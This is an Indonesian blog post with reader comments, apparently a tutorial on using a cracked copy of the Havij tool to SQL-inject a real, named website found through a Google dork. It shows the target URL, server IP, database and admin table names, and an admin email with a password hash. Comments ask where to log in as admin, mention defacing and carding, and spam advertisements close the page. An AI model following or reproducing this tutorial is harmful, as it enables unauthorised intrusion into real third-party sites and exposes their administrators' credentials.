Kemarn saya sudah share Tools Havij 1.15 Pro version [Cracked] . Kali ini saya akan share cara menggunakan Havij tersebut untuk menemukan password web target dengan SQLi .
Oke, langsung saja kita mulai ritualnya :
Pertama, cari target lewat google dork.
Google Dork : inurl:”pages.php?id=”
Lalu kita pilih salah satu target. Untuk percobaan, saya pilih target : http://www.radiesse-voice.com/pages.php?id=15
Maka kita akan mendapat data-data sebagai berikut :
Kita masukkan alamat tersebut ke kolom target yang ada di Havij lalu klik analyze . tungu sampai kolom paling bawah bertuliskan Status : I’m IDLE
Host IP: 65.98.217.75
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
Keyword Found: Billing
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: radiesse
Oke, lanjut ke step 2 : Klik Tables lalu kik Get Tables
Maka akan keluar kolom baru yaitu rad_admin, rad_news, rad_page . Karena kita ingin mencari akses admin, kita coba kolom rad_admin. centang kolom rad_admin lalu klik get columns
Setelah selesai, kita lihat di kolom bawah. Kita mendapatkan data sebagai berikut :
Data Found: admin_id,admin_email,admin_pass=1^[email protected]^f97c5d29941bfb1b2fdab0874906ab82
Oke, hampir berhasil. Kita menemukan kolom : admin_id, admin_email, admin_pass, admin_passo
Kita coba lihat isi dari admin_id , admin_email, admin_pass . Centang admin_id , admin_email, admin_pass lalu klik get data
keren sob 🙂
Thanks kawan. . .
itu wajib ada pages.php?id=15 ya bro???
waduh…lagi-lagi saya hanya bisa duduk manis mencoba menyimak aoa yang tertulis disini 🙂
Oke sobat. . .
ini pasti di forum itu tuh .. heheh… saya kemarin tau yang seperti ini soalnya 😀
Kalo ini sih di semua forum ada. Basic nya. Hehehe
menyapa pagi kesini kawan….
Thanks kawan. . .
patut dipelajari sob
izin simpan ya 🙂
Iya kawan. . .
wah saya suport saja dech sobat, masih belum paham beginian nih.. ntr kalau saya dah beli kompi, saya minta ajarin beginian sama sobat..
awas ya kalau nggak mau ngajarin hahahahahahaha
:v
met pagi nyimak bang soalnya belom punya tuh programnya hehehe
Di artikel sebelumnya ada. :v
mantabbb nih sobat…kash infonya 🙂
lanjuttt kan…hehe
Thanks kawan. . .
aduh ampun.., lengkap banget sob… *smile
:v
waduh makin membingungkan yud. tetapi oke buat pelajaran baru nih!
Hehehe. Ini mah baru basic.
pusing mas sumpah hehehe
:v
Bro boleh tau gmail kamu gak bro? Biar aku bisa kontak kamu bro tutorial carding lebih lanjut
saya coba dulu ya gan defacenya.. 🙂
bang kan ane udh dapet pass nya, nyari tempat admin login dimana ???
Pake admin finder bro
waktu encrypt pass gk bisa gan hasilnya masih bil hash
mantaplah, tapi ga semua web bisa dijeboll
Yang bilang semua siapa ?
Lanjutkan pakde….. 🙂
admin loginnya ada dimana gan ????
#bingung tingkat dewa neh…
Biar tau itu web bisa di hack darimananya min?
gan biasanya klo ngak nemu db (unknown) itu apanya yah…
md5 hash ya… yg masalah kalo password nya tdk ada dalam hash :v
makasih bang yuyud..
ane seftian.. yang dlu..
tp keren.. gw salut, soalnya ini d bahas secara detail (y)
bang cara login pke usernamenya gimana?
kan kita cuma punya emailnya
wani piro xixixixixixixixixi
copas beroh
sumber tercantum :3
test ah 🙂
ka tolong bantu gmn cara kita tau pages.php?id=15 saya udh cari di google dork ga ada terus saya coba ganti dengan angka lain ketika di analyze eror 404.jd gmn cara kita tau php?id suata website .thanks before
greattttt men
ko saya ada TULISAN
"Component 'tabctl32.ocx' blablablablablablablablablablablablablablablablablablablablablablablablabla
"run as administrator" gan
kenapa tu bang halaman depan printscreen kok ada tulisan merah madura ciber. kenapa gambar yg lain kok gak ada.
jangan2 abang juga Copas
gan klw yang ini /pages.php?id=15 maksudnya apanya tuh gan?
trus klw cara ngedapetinnya gimana? mohon bimbingannya gan. (newbie)
F*ck lu copas punya web orang
gw copas dimana njing jawab
Oh my goodness! Incredible article dude! Many thanks, However I am encountering problems with your RSS.
I don't understand the reason why I am unable to join it.
Is there anybody else getting the same RSS problems? Anyone that knows the
answer can youu kindky respond? Thanks!!
Stop byy myy website :: post divorce advice for men
segera miliki rumah tahan gempa desain klasik, menarik dgn suasana pedesaan yang eksotik. tersedia berbagai macam model
rumah jawa seperti
rumah joglo
rumah limasan
rumah kampung. kami juga menjual
gebyok kayu jati lawas
jangan biarkan kulit keriput, jerawat dan bisul-bisul mengganggu penampilan anda, segera obati dengan gluta drink.
manfaat susu gluta drink sudah terbukti nyata dan gluta drink yang asli hanya bisa anda dapatkan di
distributor gluta drink yogyakarta
Waspada kanker serviks! jangan anggap sepele masalah keputihan anda, bisa jadi keputihan yang berlebih adalah gejala kanker serviks.
berikut ini adalah cara mengobati keputihan dengan crystal x asli.
viagra for sale online buying viagra in uk online buy viagra in sydney australia http://llviabest.com/ – buying viagra online using pay pal ’
mau tanya nih bro kok di bagian menu tabels nya nggak bisa kebuka ya, gimana ya caranya?
Layanan Bangun dan Renovasi Rumah All-in-One
Limasanjati.id menawarkan solusi bangun dan renovasi rumah Joglo dan rumah Limasan All-in-One yang hemat waktu dan biaya.
Tim profesional kami akan menangani semua proses dari awal hingga akhir, mulai dari perencanaan, pembuatan desain, pengadaan material, pembangunan, hingga penyelesaian dan terima kunci.
Dengan layanan ini, Anda hanya perlu berurusan dengan satu pihak untuk semua kebutuhan bangun dan renovasi rumah Anda, sehingga alur proyek lebih optimal, efisien, tepat waktu, terhindar dari miskomunikasi dan kerumitan yang menghambat pengerjaan.